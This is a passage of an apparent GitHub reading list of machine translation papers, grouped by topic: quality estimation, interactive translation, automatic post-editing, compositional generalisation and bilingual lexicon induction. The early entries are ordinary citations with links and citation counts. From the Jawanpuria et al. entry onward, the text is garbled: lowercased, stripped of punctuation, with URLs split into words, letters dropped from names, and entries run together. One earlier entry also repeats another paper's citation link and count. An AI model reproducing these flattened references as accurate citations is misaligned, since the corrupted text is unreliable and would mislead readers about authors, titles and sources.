* Hyun Kim and Jong-Hyeok Lee. 2016. [A Recurrent Neural Networks Approach for Estimating the Quality of Machine Translation Output](http://aclweb.org/anthology/N16-1059). In Proceedings of NAACL 2016. ([Citation](https://scholar.google.com.hk/scholar?cites=830241254846777269&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Hyun Kim, Jong-Hyeok Lee, and Seung-Hoon Na. 2017. [Predictor-Estimator Using Multilevel Task Learning with Stack Propagation for Neural Quality Estimation](http://aclweb.org/anthology/W17-4763). In Proceedings of WMT 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=14077676925816230812&as_sdt=2005&sciodt=0,5&hl=en): 10)
* Osman Baskaya, Eray Yildiz, Doruk Tunaoglu, Mustafa Tolga Eren, and A. Seza Doğruöz. 2017. [Integrating Meaning into Quality Evaluation of Machine Translation](http://aclweb.org/anthology/E17-1020). In Proceedings of EACL 2017.
* Yvette Graham, Qingsong Ma, Timothy Baldwin, Qun Liu, Carla Parra, and Carolina Scarton. 2017. [Improving Evaluation of Document-level Machine Translation Quality Estimation](http://aclweb.org/anthology/E17-2057). In Proceedings of EACL 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=13409644842476040211&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Rico Sennrich. 2017. [How Grammatical is Character-level Neural Machine Translation? Assessing MT Quality with Contrastive Translation Pairs](http://aclweb.org/anthology/E17-2060). In Proceedings of EACL 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=14294900718072928557&as_sdt=2005&sciodt=0,5&hl=en): 25)
* Pierre
Isabelle, Colin Cherry, and George Foster. 2017. [A Challenge Set Approach to Evaluating Machine Translation](http://aclweb.org/anthology/D17-1263). In Proceedings of EMNLP 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=10744403566307443052&as_sdt=2005&sciodt=0,5&hl=en): 26)
* André F. T. Martins, Marcin Junczys-Dowmunt, Fabio N. Kepler, Ramón Astudillo, Chris Hokamp, and Roman Grundkiewicz. 2017. [Pushing the Limits of Translation Quality Estimation](http://aclweb.org/anthology/Q17-1015). Transactions of the Association for Computational Linguistics. ([Citation](https://scholar.google.com.hk/scholar?cites=17497507120611954135&as_sdt=2005&sciodt=0,5&hl=en): 13)
* Maoxi Li, Qingyu Xiang, Zhiming Chen, and Mingwen Wang. 2018. [A Unified Neural Network for Quality Estimation of Machine Translation](https://www.jstage.jst.go.jp/article/transinf/E101.D/9/E101.D_2018EDL8019/_article/-char/en). IEICE Transactions on Information and Systems. ([Citation](https://scholar.google.com.hk/scholar?cites=17497507120611954135&as_sdt=2005&sciodt=0,5&hl=en): 13)
* Lucia Specia, Frédéric Blain, Varvara Logacheva, Ramón F. Astudillo, and André Martins. 2018. [Findings of the WMT 2018 Shared Task on Quality Estimation](http://aclweb.org/anthology/W18-6451). In Proceedings of the Third Conference on Machine Translation. ([Citation](https://scholar.google.com.hk/scholar?cites=11225823265419143916&as_sdt=2005&sciodt=0,5&hl=en): 2)
* Craig Stewart, Nikolai Vogler, Junjie Hu, Jordan Boyd-Graber, and Graham Neubig. 2018. [Automatic Estimation of Simultaneous Interpreter Performance](http://aclweb.org/anthology/P18-2105). In Proceedings of ACL 2018. ([Citation](https://scholar.google.com.hk/scholar?hl=en&as_sdt=2005&sciodt=0,5&cites=5687670489913511293&scipsc=): 1)
* Holger Schwenk. 2018. [Filtering and Mining Parallel Data in a Joint Multilingual Space](http://aclweb.org/anthology/P18-2037). In Proceedings of ACL 2018. ([Citation](https://scholar.google.com.hk/scholar?cites=7363119514762721542&as_sdt=2005&sciodt=0,5&hl=en): 4)
* Julia Ive, Frédéric Blain, and Lucia Specia. 2018. [deepQuest: A Framework for Neural-based Quality Estimation](http://aclweb.org/anthology/C18-1266). In Proceedings of COLING 2018. ([Citation](https://scholar.google.com.hk/scholar?cites=4501237247493636014&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Kai Fan, Jiayi Wang, Bo Li, Fengming Zhou, Boxing Chen, and Luo Si. 2019. ["Bilingual Expert" Can Find Translation Errors](https://arxiv.org/pdf/1807.09433). In Proceedings of AAAI 2019.
* Aditya Siddhant, Melvin Johnson, Henry Tsai, Naveen Arivazhagan, Jason Riesa, Ankur Bapna, Orhan Firat, and Karthik Raman. 2020. [Evaluating the Cross-Lingual Effectiveness of Massively Multilingual Neural Machine Translation](https://arxiv.org/abs/1909.00437). In Proceedings of AAAI 2020.
* Shu Okabe, Frédéric Blain, and Lucia Specia. 2020. [Multimodal Quality Estimation for Machine Translation](https://www.aclweb.org/anthology/2020.acl-main.114). In Proceedings of ACL 2020.
* Marina Fomicheva, Shuo Sun, Lisa Yankovskaya, Frédéric Blain, Francisco Guzmán, Mark Fishel, Nikolaos Aletras, Vishrav Chaudhary, and Lucia Specia. 2020. [Unsupervised Quality Estimation for Neural Machine Translation](https://arxiv.org/abs/2005.10608). Transactions of the Association for Computational Linguistics.
* Jingyi Zhang and Josef van Genabith. 2020. [Translation Quality Estimation by Jointly Learning to Score and Rank](https://www.aclweb.org/anthology/2020.emnlp-main.205). In Proceedings of EMNLP 2020.
* Vânia Mendonça, Ricardo Rei, Luísa Coheur, Alberto Sardinha, and Ana Lúcia Santos. 2021. [Online Learning Meets Machine Translation Evaluation: Finding the Best Systems with the Least Human Effort](https://aclanthology.org/2021.acl-long.242.pdf). In Proceedings of ACL 2021.

<h3 id="human-centered">Human-centered NMT</h3>

<h4 id="interactive-nmt">Interactive NMT</h4>

* Joern Wuebker, Spence Green, John DeNero, Saša Hasan, and Minh-Thang Luong. 2016. [Models and Inference for Prefix-Constrained Machine Translation](http://aclweb.org/anthology/P16-1007). In Proceedings of ACL 2016. ([Citation](https://scholar.google.com/scholar?cites=6217828709297735294&as_sdt=2005&sciodt=0,5&hl=es): 14)
* Rebecca Knowles and Philipp Koehn. 2016. [Neural Interactive Translation Prediction](https://www.cs.jhu.edu/~phi/publications/neural-interactive-translation.pdf). In Proceedings of AMTA 2016. ([Citation](https://scholar.google.es/scholar?cites=16855799109441363843&as_sdt=2005&sciodt=0,5&hl=es): 24)
* Álvaro Peris, Miguel Domingo, and Francisco Casacuberta. 2017. [Interactive Neural Machine Translation](https://www.researchgate.net/publication/312275926). In Computer Speech and Language. ([Citation](https://scholar.google.com/scholar?oi=bibs&hl=es&cites=2848232799976037224&as_sdt=5): 21)
* Khanh Nguyen, Hal Daumé III, and Jordan Boyd-Graber. 2017. [Reinforcement Learning for Bandit Neural Machine Translation with Simulated Human Feedback](http://aclweb.org/anthology/D17-1153). In Proceedings of EMNLP 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=15247143946986909844&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Álvaro Peris and Francisco Casacuberta. 2018. [Active Learning for Interactive Neural Machine Translation of Data Streams](http://aclweb.org/anthology/K18-1015). In Proceedings of CoNLL 2018. ([Citation](https://scholar.google.com/scholar?oi=bibs&hl=es&cites=14996862010471139834&as_sdt=5): 1)
* Tsz Kin Lam, Julia Kreutzer, and Stefan Riezler. 2018. [A Reinforcement Learning Approach to Interactive-Predictive Neural Machine Translation](https://arxiv.org/pdf/1805.01553). In Proceedings of EAMT 2018.
* Julia Kreutzer, Shahram Khadivi, Evgeny Matusov, and Stefan Riezler. 2018. [Can Neural Machine Translation be Improved with User Feedback?](http://aclweb.org/anthology/N18-3012) In Proceedings of NAACL 2018. ([Citation](https://scholar.google.com/scholar?oi=bibs&hl=en&cites=5878376279798739633): 3)
* Pavel Petrushkov, Shahram Khadivi, and Evgeny Matusov. 2018. [Learning from Chunk-based Feedback in Neural Machine Translation](http://aclweb.org/anthology/P18-2052). In Proceedings of ACL 2018. ([Citation](https://scholar.google.com.hk/scholar?cites=11022197412542590938&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Julia Kreutzer, Joshua Uyheng, and Stefan Riezler. 2018. [Reliability and Learnability of Human Bandit Feedback for Sequence-to-Sequence Reinforcement Learning](http://aclweb.org/anthology/P18-1165). In Proceedings of ACL 2018. ([Citation](https://scholar.google.com.hk/scholar?cites=13544384067638756323&as_sdt=2005&sciodt=0,5&hl=en): 2)
* Álvaro Peris and Francisco Casacuberta. 2019. [A Neural, Interactive-predictive System for Multimodal Sequence to Sequence Tasks](https://arxiv.org/pdf/1905.08181). In Proceedings of ACL 2019.
* Miguel Domingo, Mercedes García-Martínez, Amando Estela, Laurent Bié, Alexandre Helle, Álvaro Peris, Francisco Casacuberta, and Manuel Herranz. 2019. [Demonstration of a Neural Machine Translation System with Online Learning for Translators](https://arxiv.org/pdf/1906.09000). In Proceedings of ACL 2019.
* Julia Kreutzer and Stefan Riezler. 2019. [Self-Regulated Interactive Sequence-to-Sequence Learning](https://arxiv.org/pdf/1907.05190.pdf). In Proceedings of ACL 2019.

<h4 id="ape">Automatic Post-Editing</h4>

* Santanu Pal, Sudip Kumar Naskar, Mihaela Vela, and Josef van Genabith. 2016. [A Neural Network based Approach to Automatic Post-Editing](http://aclweb.org/anthology/P16-2046). In Proceedings of ACL 2016. ([Citation](https://scholar.google.com.hk/scholar?cites=12283909725778804406&as_sdt=2005&sciodt=0,5&hl=en): 14)
* Marcin Junczys-Dowmunt and Roman Grundkiewicz. 2016. [Log-linear Combinations of Monolingual and Bilingual Neural Machine Translation Models for Automatic Post-Editing](http://aclweb.org/anthology/W16-2378). In Proceedings of the First Conference on Machine Translation: Volume 2, Shared Task Papers. ([Citation](https://scholar.google.com.hk/scholar?cites=8379495332607620604&as_sdt=2005&sciodt=0,5&hl=en): 27)
* Santanu Pal, Sudip Kumar Naskar, Mihaela Vela, Qun Liu, and Josef van Genabith. 2017. [Neural Automatic Post-Editing Using Prior Alignment and Reranking](http://aclweb.org/anthology/E17-2056). In Proceedings of EACL 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=17137949386428082191&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Rajen Chatterjee, Gebremedhen Gebremelak, Matteo Negri, and Marco Turchi. 2017. [Online Automatic Post-editing for MT in a Multi-Domain Translation Environment](http://aclweb.org/anthology/E17-1050). In Proceedings of EACL 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=16624698279716802422&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Marcin Junczys-Dowmunt and Roman Grundkiewicz. 2017. [An Exploration of Neural Sequence-to-Sequence Architectures for Automatic Post-Editing](http://aclweb.org/anthology/I17-1013). In Proceedings of IJCNLP 2017.
* David Grangier and Michael Auli. 2018. [QuickEdit: Editing Text & Translations by Crossing Words Out](http://aclweb.org/anthology/N18-1025). In Proceedings of NAACL 2018. ([Citation](https://scholar.google.com.hk/scholar?cites=9500777791162222168&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Thuy-Trang Vu and Gholamreza Haffari. 2018. [Automatic Post-Editing of Machine Translation: A Neural Programmer-Interpreter Approach](http://aclweb.org/anthology/D18-1341). In Proceedings of EMNLP 2018.
* Marcin Junczys-Dowmunt and Roman Grundkiewicz. 2018. [MS-UEdin Submission to the WMT2018 APE Shared Task: Dual-Source Transformer for Automatic Post-Editing](https://arxiv.org/pdf/1809.00188.pdf). In Proceedings of WMT 2018.
* Gonçalo M. Correia and André F. T. Martins. 2019. [A Simple and Effective Approach to Automatic Post-Editing with Transfer Learning](https://arxiv.org/pdf/1906.06253). In Proceedings of ACL 2019.
* Xuancheng Huang, Yang Liu, Huanbo Luan, Jingfang Xu, and Maosong Sun. 2019. [Learning to Copy for Automatic Post-Editing](https://www.aclweb.org/anthology/D19-1634.pdf). In Proceedings of EMNLP 2019.
* Nico Herbig, Tim Düwel, Santanu Pal, Kalliopi Meladaki, Mahsa Monshizadeh, Antonio Krüger, and Josef van Genabith. 2020. [MMPE: A Multi-Modal Interface for Post-Editing Machine Translation](https://www.aclweb.org/anthology/2020.acl-main.155). In Proceedings of ACL 2020.
* Shamil Chollampatt, Raymond Hendy Susanto, Liling Tan, and Ewa Szymanska. 2020. [Can Automatic Post-Editing Improve NMT?](https://www.aclweb.org/anthology/2020.emnlp-main.217) In Proceedings of EMNLP 2020.

<h3 id="poetry-translation">Poetry Translation</h3>

* Marjan Ghazvininejad, Yejin Choi, and Kevin Knight. 2018. [Neural Poetry Translation](http://aclweb.org/anthology/N18-2011). In
Proceedings of NAACL 2018. ([Citation](https://scholar.google.com.hk/scholar?cites=4597758342230970450&as_sdt=2005&sciodt=0,5&hl=en): 1)

<h3 id="eco-friendly">Eco-friendly</h3>

* Emma Strubell, Ananya Ganesh, and Andrew McCallum. 2019. [Energy and Policy Considerations for Deep Learning in NLP](https://www.aclweb.org/anthology/P19-1355). In Proceedings of ACL 2019.

<h3 id="compositional-generalization">Compositional Generalization</h3>

* Yafu Li, Yongjing Yin, Yulong Chen, and Yue Zhang. 2021. [On Compositional Generalization of Neural Machine Translation](https://aclanthology.org/2021.acl-long.368). In Proceedings of ACL 2021.
* Verna Dankers, Elia Bruni, and Dieuwke Hupkes. 2022. [The Paradox of the Compositionality of Natural Language: A Neural Machine Translation Case Study](https://aclanthology.org/2022.acl-long.286). In Proceedings of ACL 2022.
* Hao Zheng and Mirella Lapata. 2022. [Disentangled Sequence to Sequence Learning for Compositional Generalization](https://aclanthology.org/2022.acl-long.293). In Proceedings of ACL 2022.
* Verna Dankers, Christopher Lucas, and Ivan Titov. 2022. [Can Transformer be Too Compositional? Analysing Idiom Processing in Neural Machine Translation](https://aclanthology.org/2022.acl-long.252). In Proceedings of ACL 2022.

<h3 id="endangered">Endangered Language Revitalization</h3>

* Shiyue Zhang, Benjamin Frey, and Mohit Bansal. 2020. [ChrEn: Cherokee-English Machine Translation for Endangered Language Revitalization](https://www.aclweb.org/anthology/2020.emnlp-main.43). In Proceedings of EMNLP 2020.
* Tahmid Hasan, Abhik Bhattacharjee, Kazi Samin, Masum Hasan, Madhusudan Basak, M. Sohel Rahman, and Rifat Shahriyar. 2020. [Not Low-Resource Anymore: Aligner Ensembling, Batch Filtering, and New Datasets for Bengali-English Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.207). In Proceedings of EMNLP 2020.

<h2 id="word-translation">Word Translation</h2>

* Tomas Mikolov, Quoc V. Le, and Ilya Sutskever. 2013. [Exploiting Similarities among Languages for Machine Translation](https://arxiv.org/pdf/1309.4168.pdf). arXiv:1309.4168. ([Citation](https://scholar.google.com.hk/scholar?cites=18389495985810631724&as_sdt=2005&sciodt=0,5&hl=en): 581)
* Chao Xing, Dong Wang, Chao Liu, and Yiye Lin. 2015. [Normalized Word Embedding and Orthogonal Transform for Bilingual Word Translation](http://aclweb.org/anthology/N15-1104). In Proceedings of NAACL 2015. ([Citation](https://scholar.google.com.hk/scholar?hl=zh-CN&as_sdt=2005&sciodt=0,5&cites=4009320309746318198&scipsc=): 89)
* Georgiana Dinu, Angeliki Lazaridou, and Marco Baroni. 2015. [Improving Zero-shot Learning by Mitigating the Hubness Problem](https://arxiv.org/pdf/1412.6568.pdf). In Proceedings of ICLR 2015. ([Citation](https://scholar.google.com.hk/scholar?cites=4810137765860435505&as_sdt=2005&sciodt=0,5&hl=en): 110)
* Meng Zhang, Yang Liu, Huanbo Luan, Maosong Sun, Tatsuya Izuha, and Jie Hao. 2016. [Building Earth Mover's Distance on Bilingual Word Embeddings for Machine Translation](http://www.aaai.org/ocs/index.php/AAAI/AAAI16/paper/download/12227/12035). In Proceedings of AAAI 2016. ([Citation](https://scholar.google.com.hk/scholar?cites=10787724557107708547&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Meng Zhang, Yang Liu, Huanbo Luan, Yiqun Liu, and Maosong Sun. 2016. [Inducing Bilingual Lexica from Non-Parallel Data with Earth Mover's Distance Regularization](http://aclweb.org/anthology/C16-1300). In Proceedings of COLING 2016. ([Citation](https://scholar.google.com.hk/scholar?cites=7442971885961632428&as_sdt=2005&sciodt=0,5&hl=en): 4)
* Ivan Vulić and Anna Korhonen. 2016. [On the Role of Seed Lexicons in Learning Bilingual Word Embeddings](http://www.aclweb.org/anthology/P16-1024). In Proceedings of ACL 2016. ([Citation](https://scholar.google.com.hk/scholar?cites=9848186834020452809&as_sdt=2005&sciodt=0,5&hl=en): 39)
* Mikel Artetxe, Gorka Labaka, and Eneko Agirre. 2016. [Learning Principled Bilingual Mappings of Word Embeddings while Preserving Monolingual Invariance](http://www.aclweb.org/anthology/D16-1250). In Proceedings of EMNLP 2016. ([Citation](https://scholar.google.com.hk/scholar?cites=5308709105842309671&as_sdt=2005&sciodt=0,5&hl=en): 73)
* Meng Zhang, Haoruo Peng, Yang Liu, Huanbo Luan, and Maosong Sun. 2017. [Bilingual Lexicon Induction from Non-Parallel Data with Minimal Supervision](http://www.aaai.org/ocs/index.php/AAAI/AAAI17/paper/download/14682/14264). In Proceedings of AAAI 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=6351287463037630922&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Ann Irvine and Chris Callison-Burch. 2017. [A Comprehensive Analysis of Bilingual Lexicon Induction](http://aclweb.org/anthology/J17-2001). Computational Linguistics. ([Citation](https://scholar.google.com.hk/scholar?cites=9284068492500255032&as_sdt=2005&sciodt=0,5&hl=en): 12)
* Mikel Artetxe, Gorka Labaka, and Eneko Agirre. 2017. [Learning Bilingual Word Embeddings with (Almost) No Bilingual Data](http://aclweb.org/anthology/P17-1042). In Proceedings of ACL 2017. ([Citation](https://scholar.google.com.hk/scholar?cites=17614535864871662614&as_sdt=2005&sciodt=0,5&hl=en): 62)
* Meng Zhang, Yang Liu, Huanbo Luan, and Maosong Sun. 2017. [Adversarial Training for Unsupervised Bilingual Lexicon Induction](http://aclweb.org/anthology/P17-1179). In Proceedings of ACL 2017. ([Citation](https://scholar.google.com/scholar?um=1&ie=UTF-8&lr=&cites=1858752500147406961): 41)
* Geert Heyman, Ivan Vulić, and Marie-Francine Moens. 2017. [Bilingual Lexicon Induction by Learning to Combine Word-Level and Character-Level Representations](http://aclweb.org/anthology/E17-1102). In Proceedings of EACL 2017. ([Citation](https://scholar.google.com/scholar?cites=585284476576929954&as_sdt=2005&sciodt=0,5&hl=en): 9)
* Bradley Hauer, Garrett Nicolai, and Grzegorz Kondrak. 2017. [Bootstrapping Unsupervised Bilingual Lexicon Induction](http://aclweb.org/anthology/E17-2098). In Proceedings of EACL 2017. ([Citation](https://scholar.google.com/scholar?cites=12378647251883332742&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Yunsu Kim, Julian Schamper, and Hermann Ney. 2017. [Unsupervised Training for Large Vocabulary Translation Using Sparse Lexicon and Word Classes](http://aclweb.org/anthology/E17-2103). In Proceedings of EACL 2017. ([Citation](https://scholar.google.com/scholar?um=1&ie=UTF-8&lr=&cites=10713109281510942659): 1)
* Derry Tanti Wijaya, Brendan Callahan, John Hewitt, Jie Gao, Xiao Ling, Marianna Apidianaki, and Chris Callison-Burch. 2017. [Learning Translations via Matrix Completion](http://aclweb.org/anthology/D17-1152). In Proceedings of EMNLP 2017. ([Citation](https://scholar.google.com/scholar?cites=9020955741604455257&as_sdt=2005&sciodt=0,5&hl=en): 3)
* Meng Zhang, Yang Liu, Huanbo Luan, and Maosong Sun. 2017. [Earth Mover's Distance Minimization for Unsupervised Bilingual Lexicon Induction](http://aclweb.org/anthology/D17-1207). In Proceedings of EMNLP 2017. ([Citation](https://scholar.google.com/scholar?cites=8228362677106813515&as_sdt=2005&sciodt=0,5&hl=en): 26)
* Ndapandula Nakashole and Raphael Flauger. 2017. [Knowledge Distillation for Bilingual Dictionary Induction](http://aclweb.org/anthology/D17-1264). In Proceedings of EMNLP 2017. ([Citation](https://scholar.google.com/scholar?cites=1036105547945298329&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Hanan Aldarmaki, Mahesh Mohan, and Mona Diab. 2018. [Unsupervised Word Mapping Using Structural Similarities in Monolingual Embeddings](http://aclweb.org/anthology/Q18-1014). Transactions of the Association for Computational Linguistics. ([Citation](https://scholar.google.com/scholar?cites=4781812228167043431&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Guillaume Lample, Alexis Conneau, Marc'Aurelio Ranzato, Ludovic Denoyer, and Hervé Jégou. 2018. [Word Translation Without Parallel Data](https://openreview.net/pdf?id=H196sainb). In Proceedings of ICLR 2018. ([Citation](https://scholar.google.com/scholar?cites=8622718096243524923&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Fabienne Braune, Viktor Hangya, Tobias Eder, and Alexander Fraser. 2018. [Evaluating Bilingual Word Embeddings on the Long Tail](http://aclweb.org/anthology/N18-2030). In Proceedings of NAACL 2018. ([Citation](https://scholar.google.com/scholar?cites=1773448771543494989&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Ndapa Nakashole and Raphael Flauger. 2018. [Characterizing Departures from Linearity in Word Translation](http://aclweb.org/anthology/P18-2036). In Proceedings of ACL 2018. ([Citation](https://scholar.google.com/scholar?cites=669635789435605162&as_sdt=2005&sciodt=0,5&hl=en): 3)
* Anders Søgaard, Sebastian Ruder, and Ivan Vulić. 2018. [On the Limitations of Unsupervised Bilingual Dictionary Induction](http://aclweb.org/anthology/P18-1072). In Proceedings of ACL 2018. ([Citation](https://scholar.google.com/scholar?cites=1427533216601294786&as_sdt=2005&sciodt=0,5&hl=en): 17)
* Mikel Artetxe, Gorka Labaka, and Eneko Agirre. 2018. [A Robust Self-learning Method for Fully Unsupervised Cross-lingual Mappings of Word Embeddings](http://aclweb.org/anthology/P18-1073). In Proceedings of ACL 2018. ([Citation](https://scholar.google.com/scholar?cites=7012967033921106213&as_sdt=2005&sciodt=0,5&hl=en): 17)
* Parker Riley and Daniel Gildea. 2018. [Orthographic Features for Bilingual Lexicon Induction](http://aclweb.org/anthology/P18-2062). In Proceedings of ACL 2018.
* Amir Hazem and Emmanuel Morin. 2018. [Leveraging Meta-Embeddings for Bilingual Lexicon Extraction from Specialized Comparable Corpora](http://aclweb.org/anthology/C18-1080). In Proceedings of COLING 2018.
* Lifu Huang, Kyunghyun Cho, Boliang Zhang, Heng Ji, and Kevin Knight. 2018. [Multi-lingual Common Semantic Space Construction via Cluster-Consistent Word Embedding](http://aclweb.org/anthology/D18-1023). In Proceedings of EMNLP 2018.
* Xilun Chen and Claire Cardie. 2018. [Unsupervised Multilingual Word Embeddings](http://aclweb.org/anthology/D18-1024). In Proceedings of EMNLP 2018. ([Citation](https://scholar.google.com/scholar?cites=15847135808149408064&as_sdt=2005&sciodt=0,5&hl=en): 4)
* Ta Chung Chi and Yun-Nung Chen. 2018. [CLUSE: Cross-Lingual Unsupervised Sense Embeddings](http://aclweb.org/anthology/D18-1025). In Proceedings of EMNLP 2018. ([Citation](https://scholar.google.com/scholar?cites=1931895311858153391&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Yerai Doval, Jose Camacho-Collados, Luis Espinosa-Anke, and Steven Schockaert. 2018. [Improving Cross-Lingual Word Embeddings by Meeting in the Middle](http://aclweb.org/anthology/D18-1027). In Proceedings of EMNLP 2018.
* Sebastian Ruder, Ryan Cotterell, Yova Kementchedjhieva, and Anders Søgaard. 2018. [A Discriminative Latent-Variable Model for Bilingual Lexicon Induction](http://aclweb.org/anthology/D18-1042). In Proceedings of EMNLP 2018.
* Yedid Hoshen and Lior Wolf. 2018. [Non-Adversarial Unsupervised Word Translation](http://aclweb.org/anthology/D18-1043). In Proceedings of EMNLP 2018.
* Ndapa Nakashole. 2018. [NORMA: Neighborhood Sensitive Maps for Multilingual Word Embeddings](http://aclweb.org/anthology/D18-1047). In Proceedings of EMNLP 2018.
* Mareike Hartmann, Yova Kementchedjhieva, and Anders Søgaard. 2018. [Why is Unsupervised Alignment of English Embeddings from Different Algorithms so Hard?](http://aclweb.org/anthology/D18-1056) In Proceedings of EMNLP 2018.
* Zi-Yi Dou, Zhi-Hao Zhou, and Shujian Huang. 2018. [Unsupervised Bilingual Lexicon Induction via Latent Variable Models](http://aclweb.org/anthology/D18-1062). In Proceedings of EMNLP 2018.
* Tanmoy Mukherjee, Makoto Yamada, and Timothy Hospedales. 2018. [Learning Unsupervised Word Translations Without Adversaries](http://aclweb.org/anthology/D18-1063). In Proceedings of EMNLP 2018.
* David Alvarez-Melis and Tommi Jaakkola. 2018. [Gromov-Wasserstein Alignment of Word Embedding Spaces](http://aclweb.org/anthology/D18-1214). In Proceedings of EMNLP 2018.
* Ruochen Xu, Yiming Yang, Naoki Otani, and Yuexin Wu. 2018. [Unsupervised Cross-lingual Transfer of Word Embedding Spaces](http://aclweb.org/anthology/D18-1268). In Proceedings of EMNLP 2018. ([Citation](https://scholar.google.com/scholar?um=1&ie=UTF-8&lr=&cites=15320274773511615227): 2)
* Armand Joulin, Piotr Bojanowski, Tomas Mikolov, Hervé Jégou, and Edouard Grave. 2018. [Loss in Translation: Learning Bilingual Word Mapping with a Retrieval Criterion](http://aclweb.org/anthology/D18-1330). In Proceedings of EMNLP 2018. ([Citation](https://scholar.google.com/scholar?cites=437763240249389525&as_sdt=2005&sciodt=0,5&hl=en): 2)
* Sebastian Ruder, Ivan Vulić, and Anders Søgaard. 2019. [A Survey of Cross-lingual Word Embedding Models](https://arxiv.org/pdf/1706.04902.pdf). Journal of Artificial Intelligence Research. ([Citation](https://scholar.google.com/scholar?cites=2174368482827457639&as_sdt=2005&sciodt=0,5&hl=en): 22)
* Pratik Jawanpuria, Arjun
balgovind anoop kunchukuttan and bamdev mishra 2019 learning multilingual word embeddings in latent metric space a geometric approach https arxiv org pdf 1808 08773 transactions of the association for computational linguistics citation https scholar google com scholar cites 3887586742254907953 as sdt 2005 sciodt 0 5 hl en 3 tasnim mohiuddin and shafiq joty 2019 revisiting adversarial autoencoder for unsupervised word translation with cycle consistency and improved training https arxiv org pdf 1904 04116 pdf in proceedings of naacl 2019 chunting zhou xuezhe ma di wang and graham neubig 2019 density matching for bilingual word embedding https arxiv org pdf 1904 02343 pdf in proceedings of naacl 2019 noa yehezkel lubin jacob goldberger and yoav goldberg 2019 aligning vector spaces with noisy supervised lexicons https arxiv org pdf 1903 10238 pdf in proceedings of naacl 2019 tal schuster ori ram regina barzilay and amir globerson 2019 cross lingual alignment of contextual word embeddings with applications to zero shot dependency parsing https arxiv org pdf 1902 09492 pdf in proceedings of naacl 2019 hanan aldarmaki and mona diab 2019 context aware cross lingual mapping https arxiv org pdf 1903 03243 pdf in proceedings of naacl 2019 yoshinari fujinuma jordan boyd graber and michael j paul 2019 a resource free evaluation metric for cross lingual word embeddings based on graph modularity https arxiv org pdf 1906 01926 in proceedings of acl 2019 mozhi zhang keyulu xu ken ichi kawarabayashi stefanie jegelka and jordan boyd graber 2019 are girls neko or sh jo cross lingual alignment of non isomorphic embeddings with iterative normalization https arxiv org pdf 1906 01622 in proceedings of acl 2019 aitor ormazabal mikel artetxe gorka labaka aitor soroa and eneko agirre 2019 analyzing the limitations of cross lingual word embedding mappings https arxiv org pdf 1906 05407 in proceedings of acl 2019 takashi wada tomoharu iwata and yuji matsumoto 2019 unsupervised multilingual 
word embedding with limited resources using neural language models https www aclweb org anthology p19 1300 in proceedings of acl 2019 pengcheng yang fuli luo peng chen tianyu liu and xu sun 2019 maam a morphology aware alignment model for unsupervised bilingual lexicon induction https www aclweb org anthology p19 1308 in proceedings of acl 2019 benjamin marie and atsushi fujita 2019 unsupervised joint training of bilingual word embeddings https www aclweb org anthology p19 1312 in proceedings of acl 2019 mikel artetxe gorka labaka and eneko agirre 2019 bilingual lexicon induction through unsupervised machine translation https www aclweb org anthology p19 1494 in proceedings of acl 2019 elias stengel eskin tzu ray su matt post and benjamin van durme 2019 a discriminative neural model for cross lingual word alignment https arxiv org pdf 1909 00444 in proceedings of emnlp 2019 ivan vuli goran glava roi reichart and anna korhonen 2019 do we really need fully unsupervised cross lingual embeddings https arxiv org pdf 1909 01638 in proceedings of emnlp 2019 paula czarnowska sebastian ruder edouard grave ryan cotterell and ann copestake 2019 don t forget the long tail a comprehensive analysis of morphological generalization in bilingual lexicon induction https arxiv org pdf 1909 02855 in proceedings of emnlp 2019 yova kementchedjhieva mareike hartmann and anders s gaard 2019 lost in evaluation misleading benchmarks for bilingual dictionary induction https arxiv org pdf 1909 05708 in proceedings of emnlp 2019 mareike hartmann yova kementchedjhieva anders s gaard 2019 comparing unsupervised word translation methods step by step https papers nips cc paper 8836 comparing unsupervised word translation methods step by step in proceedings of neurips 2019 steven cao nikita kitaev dan klein 2020 multilingual alignment of contextual word representations https openreview net forum id r1xcmybtps in proceedings of iclr 2020 g bor berend 2020 massively multilingual sparse word 
representations https openreview net forum id hyeytgrfpb in proceedings of iclr 2020 xu zhao zihao wang yong zhang and hao wu 2020 a relaxed matching procedure for unsupervised bli https www aclweb org anthology 2020 acl main 274 in proceedings of acl 2020 mladen karan ivan vulić anna korhonen and goran glavaš 2020 classification based self learning for weakly supervised bilingual lexicon induction https www aclweb org anthology 2020 acl main 618 in proceedings of acl 2020 shuo ren shujie liu ming zhou and shuai ma 2020 a graph based coarse to fine method for unsupervised bilingual lexicon induction https www aclweb org anthology 2020 acl main 318 in proceedings of acl 2020 pratik jawanpuria mayank meghwanshi and bamdev mishra 2020 geometry aware domain adaptation for unsupervised alignment of word embeddings https www aclweb org anthology 2020 acl main 276 in proceedings of acl 2020 tasnim mohiuddin m saiful bari shafiq joty 2020 lnmap departures from isomorphic assumption in bilingual lexicon induction through non linear mapping in latent space https www aclweb org anthology 2020 emnlp main 215 in proceedings of emnlp 2020 h2 id wmt winners wmt winners h2 wmt http www statmt org wmt19 is the most important annual international competition on machine translation we collect the competition results http matrix statmt org on the news translation task since wmt 2016 the first conference of machine translation and summarize the techniques used in the systems with the top performance currently we focus on four directions zh en en zh de en and en de the summarized algorithms might be incomplete your suggestions are welcome h3 id wmt19 wmt 2019 h3 the winner of zh en http matrix statmt org matrix systems list 1901 de en http matrix statmt org matrix systems list 